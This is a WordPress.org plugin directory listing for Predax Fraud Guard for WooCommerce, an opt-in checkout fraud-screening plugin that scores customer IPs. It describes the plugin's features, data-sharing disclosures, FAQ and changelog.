WordPress.org
Get WordPress
WordPress.org

Plugin Directory

Predax Fraud Guard for WooCommerce

Predax Fraud Guard for WooCommerce

By Predax
Download

Description

Predax Fraud Guard for WooCommerce is an opt-in checkout-screening tool. After you enter a Predax API key and choose a protection mode, the plugin sends the customer’s IP to the Predax API during WooCommerce checkout so your store can decide whether to allow, tag, or block the order.

On a fresh install the plugin does nothing — no outbound requests are made until you complete setup and pick a protection mode. The default mode once configured is tag-only (no blocking), so you can see flagged orders in your dashboard before turning on anything that rejects a customer.

How It Works

  1. You install and activate the plugin. Nothing happens — the plugin stays dormant until you finish setup.
  2. You enter a Predax API key (free account available at predax.io).
  3. You pick a protection mode in Fraud Guard Settings (or in the 3-step setup wizard). Choices: Tag + note, Block high risk, or Block critical only.
  4. On each WooCommerce checkout after that point, the plugin sends the customer’s IP address to the Predax API, receives back a risk score and signal flags (is_vpn / is_proxy / is_tor / is_datacenter), and tags / holds / blocks the order according to your configuration. Results are cached for up to 5 minutes per IP.

You can revoke the API key or switch the mode back to “Tag only” at any time.

Risk Tagging

Orders that reach the tag threshold (default: risk score 40) are tagged based on band:

  • Risk 40–69 — tagged “Predax: Medium Risk” with an order note
  • Risk 70–89 — tagged “Predax: High Risk” with an order note
  • Risk 90–100 — tagged “Predax: Critical Risk” with an order note

Features

  • Checkout screening (after you enable a protection mode) — every order is checked against Predax IP threat intelligence
  • VPN / Proxy / Tor / Datacenter flags — detect anonymised connections at checkout
  • Risk score threshold blocking — optionally block checkouts above a configurable risk score
  • Automatic order hold (opt-in) — move high-risk orders to On Hold for manual review instead of processing them
  • Order velocity rules (opt-in) — flag or block customers placing too many orders in a short window
  • Billing country vs IP mismatch (opt-in) — flag or block orders where billing country differs from detected IP country
  • Disposable email detection (opt-in) — reject checkouts using throwaway email providers (30+ supported)
  • Refund / chargeback feedback (opt-in) — when a tagged order is refunded or cancelled, add its IP to your local deny list, and/or report the outcome to the Community Threat Network (when that opt-in is enabled)
  • Order meta logging — stores risk score, threat flags, and detected country on every order for WooCommerce reporting
  • Events Log — a dashboard page showing blocked attempts and flagged orders

Defaults

All protection toggles default to off on a fresh install. The only thing the plugin writes to options on activation is a database version marker for the events-log table. You will need to explicitly enable any rule you want to apply.

Free Tier

Sign up at predax.io for a free API key. No credit card required.

Third Party Services

This plugin connects to external services operated by Predax (https://predax.io) only when you have explicitly enabled a protection mode. By activating this plugin and entering an API key you agree to the Predax Terms of Service and Privacy Policy.

You are responsible for ensuring your use of customer IP data at checkout complies with applicable privacy laws (including but not limited to GDPR, CCPA) and your own store’s privacy policy. This plugin does not assert PCI-DSS, GDPR, or CCPA compliance on your behalf.

Predax IP Intelligence API

Used to look up a risk score and classification signals for each checkout IP.

  • Data sent: the customer’s IP address at checkout; the browser-reported IANA timezone string (when available on the classic checkout form — used for the timezone-mismatch signal); your custom scoring weights (only if Custom Scoring is enabled).
  • What is NOT sent: no billing/shipping names, street addresses, phone numbers, emails, product details, prices, or payment data. The billing-country-mismatch rule compares your order’s billing country against the API’s IP-country result locally — billing details never leave your site.
  • When: during WooCommerce checkout validation, and only while a protection mode is saved in settings.
  • Caching: classification results are cached in the site’s transients for 5 minutes per IP, so repeat checkouts from the same IP do not generate duplicate API calls.
  • Endpoint: POST https://predax.io/api/v1/check/ip
  • Service URL: https://predax.io
  • Terms of Service: https://predax.io/terms
  • Privacy Policy: https://predax.io/privacy

Predax Community Threat Network (opt-in, off by default)

The plugin can optionally send an anonymised telemetry signal — the IP address, its risk score and detection flags, its network (ASN) number and name, its country code, and the checkout outcome (allowed / monitored / blocked, or refund/chargeback feedback) — to the Predax Community Threat Network so all participating stores benefit from a shared feed. The Refund / Chargeback Feedback “Log” action reports through this same channel, so it requires this opt-in; its “Blacklist” action updates your local deny list regardless.

This feature is off by default. It is controlled by the ipsentry_woo_community_enabled option, which defaults to 'no', with a checkbox on the Advanced settings tab. The plugin will not send community-feedback telemetry unless you enable it. Customers’ personal data (names, emails, billing/shipping addresses, order contents) is never included in the telemetry payload.

  • Endpoint: POST https://predax.io/api/v1/telemetry/event
  • Service URL: https://predax.io
  • Privacy Policy: https://predax.io/privacy

OAuth One-Click Connect (optional)

Only triggered when an administrator clicks the Connect with Predax button in the setup wizard. Your browser is redirected to predax.io to authorise the connection, which returns an API key to your site.

  • Data sent: your WordPress site URL, site name, and a PKCE state/code-challenge pair. No customer data is involved.
  • When: only during the click-to-connect OAuth flow.
  • Endpoint: POST https://predax.io/api/v1/oauth/token
  • Service URL: https://predax.io
  • Privacy Policy: https://predax.io/privacy

Cookies set by this plugin

  • ipsentry_tz — set on WooCommerce checkout pages (only while an API key is configured) via assets/js/ipsentry-woo-tz.js. Stores the customer’s browser-reported IANA timezone (string, max 64 chars). Used server-side for the optional timezone-mismatch fraud rule. Expires after 24 hours (max-age=86400), path=/, SameSite=Lax, and marked Secure on HTTPS stores. The plugin reads this cookie only at checkout-validation time.

The plugin does not set any advertising, analytics, or tracking cookies.

Screenshots

WooCommerce Settings — Predax tab with API key, risk threshold, and fraud rules
WooCommerce Settings — Predax tab with API key, risk threshold, and fraud rules
Order detail — Predax risk score, flags, and country shown in order meta
Order detail — Predax risk score, flags, and country shown in order meta
Order list — Predax risk tags visible in the WooCommerce orders table
Order list — Predax risk tags visible in the WooCommerce orders table
Velocity rules — configure order frequency limits per customer email and IP
Velocity rules — configure order frequency limits per customer email and IP
Billing mismatch — flag or block orders where billing country doesn't match IP country
Billing mismatch — flag or block orders where billing country doesn’t match IP country

Installation

  1. Make sure WooCommerce is installed and activated.
  2. Upload the predax-fraud-guard-for-woocommerce folder to /wp-content/plugins/.
  3. Activate the plugin through the Plugins menu in WordPress.
  4. The Setup Wizard launches on first activation. Either click Connect with Predax for OAuth one-click connection, or enter your API key manually.
  5. Pick a protection preset (Recommended / Strict / Monitor Only). This is the step where you opt in — IP lookups begin after this point.
  6. Fine-tune individual rules at Fraud Guard Settings any time.

FAQ

Does the plugin phone home before I finish setup?

No. Before you enter an API key and save a protection mode, the plugin makes zero outbound requests to predax.io. Nothing happens silently on activation.

Will it block legitimate customers?

Only if you enable a blocking mode. Until you complete setup, the mode is Tag only (no blocking — orders just get tags and notes). In the setup wizard, the pre-selected Recommended preset enables blocking of high-risk checkouts (risk score 50+); choose Monitor Only instead if you don’t want any blocking yet — each preset card lists exactly what it switches on.

What is the risk score?

A score from 0 to 100 representing how likely an IP is to be associated with fraud, anonymisation, or abuse. 0 = clean residential IP, 100 = known Tor exit or commercial VPN. The score combines VPN/proxy/Tor detection, datacenter identification, historical abuse signals, and geographic heuristics.

Does it work with Cloudflare?

Yes — enable Fraud Guard Settings Advanced “Behind a proxy / CDN” (or the same toggle on the WooCommerce Predax tab). With it on, the plugin reads the real customer IP from the CF-Connecting-IP / X-Forwarded-For headers instead of the Cloudflare edge IP. It is off by default: when your store connects directly to visitors, trusting those headers would let a customer spoof their IP to bypass fraud checks, so you only turn it on when a proxy/CDN really is in front of your site.

How do I test it without affecting real customers?

Fraud Guard Settings Developer tab enter a Test IP Override. Every checkout is then evaluated as if it came from that IP. A red admin banner reminds you test mode is active. Clear the override before going live.

Use 185.220.101.1 (risk 85, Tor-adjacent) to exercise blocking paths, or 1.1.1.1 to verify pass-through.

What order metadata is stored?

On each tagged order the plugin stores:

  • _ipsentry_risk_score — numeric risk score (0–100)
  • _ipsentry_ip — detected customer IP
  • _ipsentry_country_code — detected IP country code
  • _ipsentry_flags — comma-separated threat flag list

Does it work alongside the Predax Security plugin?

Yes. The plugins are independent but complementary — Security protects logins and registrations, Fraud Guard protects WooCommerce checkout. Both can share the same API key.

Reviews

There are no reviews for this plugin.

Contributors & Developers

“Predax Fraud Guard for WooCommerce” is open source software. The following people have contributed to this plugin.

Contributors

Translate “Predax Fraud Guard for WooCommerce” into your language.

Interested in development?

Browse the code, check out the SVN repository, or subscribe to the development log by RSS.

Changelog

1.7.0

  • Rebrand: IPSentry is now Predax. This is the first WordPress.org release of the WooCommerce plugin. The plugin name, admin menu, and links now use Predax (predax.io). Your existing settings, API key, and order data are preserved — internal option names are unchanged, so nothing needs reconfiguring.
  • Admin menu moved to a lower position so it no longer sits among the core WordPress menu items.
  • Compliance: the OAuth-callback exit page now registers and prints its CSS/JS through the WordPress script API (wp_register_style/wp_register_script + wp_print_styles/wp_print_scripts) instead of hand-written tags. The WooCommerce settings save and checkout timezone read run inside WooCommerce’s own nonce-verified flows and carry inline justifications for the static analyser.
  • Compatibility: declared WooCommerce High-Performance Order Storage (HPOS) compatibility.
  • Fix: the order-velocity time window now uses a timestamp-based date query (the previous datetime-string form could be misread by WooCommerce and count orders outside the window).
  • Hardening: checkout error notices are HTML-escaped before being added; the settings-import upload is capped at 512 KB with bounded JSON depth; the API base URL accepts http/https only; the timezone cookie is marked Secure on HTTPS stores; the Store API block path gained an explicit return after blocking.
  • Clarity: Refund / Chargeback Feedback labels and docs now state that “Log” reports go through the Community Threat Network opt-in; the readme documents exact API endpoints and the full telemetry data list.
  • New: IP allow-list (never block trusted IPs) and a managed deny-list, both supporting single IPs and CIDR ranges (IPv4 + IPv6), editable from the settings page and the WooCommerce Predax tab.
  • New: the Community Threat Network opt-in is now a settings toggle (still off by default) instead of import/export only.
  • New: Events Log retention setting (default 90 days; 0 = keep forever) with automatic daily cleanup, plus a 7-day/all-time stats summary, CSV export, and a Clear Log button.
  • New: “Behind a proxy / CDN” setting (off by default). Enable it when your store is behind Cloudflare, a CDN, or a reverse proxy so the real customer IP is read from forwarded headers; when off, only the direct connection IP is used, so the customer IP cannot be spoofed to bypass fraud checks.
  • Security: the Events Log CSV export now neutralises spreadsheet formula-injection — a billing email such as “=…@example.com” can no longer execute as a formula when the export is opened in Excel/Sheets.
  • Fix: the “Flag for review” action on the velocity, disposable-email, and billing-country-mismatch rules now reliably tags the order, adds the order note, and writes the Events Log entry (previously these markers could be dropped on processed orders).
  • Fix: a critically-risky IP (risk score 90+) is now always blocked while a blocking mode is active, even when its VPN/proxy category is set to Monitor.
  • Fix: the WooCommerce Predax settings tab now saves correctly (removed an invalid nested import form; import is now on the Fraud Guard Developer page).
  • Hardening: /0 (match-all) entries are rejected in the IP allow/deny lists, and uninstall now cleans every site on a multisite network.
  • No change to the opt-in model — the plugin still makes zero outbound requests until you enter an API key and save a protection mode.

1.6.2

  • Compliance: community-feedback telemetry is now explicitly opt-in (off by default) behind a new ipsentry_woo_community_enabled option. Existing installs stop sending telemetry until they flip this on.
  • Compliance: all phoning-home defaults flipped to off — block_proxy, block_tor, and monitor_vpn default to 'no' on fresh installs.
  • Compliance: removed the self-hosted plugin updater class per WP.org Guideline 8.
  • Compliance: extracted every inline <script> / <style> block to enqueued asset files. OAuth-callback exit page now references an external CSS/JS pair.
  • Compliance: Privacy Policy content hook (wp_add_privacy_policy_content) so admins can pull suggested text from Tools Privacy.
  • Compliance: Setup-wizard privacy-disclosure boxes added above OAuth button, manual API-key field, and preset-picker cards.
  • Compliance: nonce-before-cap order fixed on every admin-post and AJAX handler.
  • Compliance: input sanitisation tightened on every $_GET / $_POST / $_FILES read; imported settings values now validated per option type.
  • Compliance: Test-mode admin notice now scoped to Predax pages only (not global).
  • Added: uninstall.php drops the events-log table and deletes every ipsentry_woo_* option on plugin deletion.
  • Added: Domain Path: /languages header + minimal .pot translation template.
  • Added: .distignore excluding dev artefacts from the WP.org zip.
  • No behaviour change for existing installs other than the community-feedback gate — core IP checking still works as before.

1.6.1

  • Improved: OAuth connect popup now auto-closes reliably after authorization.
  • Improved: Per-user OAuth transients prevent conflicts on multi-admin sites.

1.6.0

  • New: Setup Wizard — guided 3-step setup on first activation with fraud protection presets (Recommended, Strict, Monitor Only).
  • New: One-Click Connect — click “Connect with Predax” in the setup wizard to link your store via OAuth. No API key to copy or paste.
  • New: “Run Setup Wizard” link in Developer tab to re-run the wizard at any time.

1.5.0

  • New: Events Log admin page (Predax Events Log) — two tabs showing blocked checkout attempts and flagged/held orders with IP, risk score, flags, reason, and order links.
  • New: Predax risk column on WooCommerce Orders list — shows colour-coded score badge and top threat flag.
  • Improvement: Orders now store a combined _ipsentry_flags meta key for quick flag lookup.

1.4.3

  • New: Dedicated settings page under Predax Fraud Guard in the WordPress admin left nav — same tabbed UI as the Security plugin.

1.4.2

  • New: Settings import/export — back up your configuration or copy it between sites.
  • New: Support Email field — if set, checkout block error messages include a “Contact us at…” line.

1.4.1

  • Fix: VPN/proxy customers set to Monitor mode were incorrectly blocked by the risk threshold.

1.4.0

  • New: Automatic order hold, order velocity rules, billing country vs IP mismatch, disposable email detection, refund/chargeback feedback, test IP override.

1.3.0

  • New: Off/Monitor/Block radio groups for VPN, proxy, and Tor.
  • New: Custom risk scoring weights — adjust per-signal contribution to the final risk score.

1.2.0

  • New: Country-based blocking at checkout. Whitelist support. API timeout handling.

1.1.0

  • New: Configurable risk threshold. Order meta. Detailed order notes.

1.0.0

  • Initial release. Tag-only fraud screening at checkout. VPN / proxy / Tor / datacenter detection.

Meta

Ratings

No reviews have been submitted yet.

Your review

See all reviews

Contributors

Support

Got something to say? Need help?

View support forum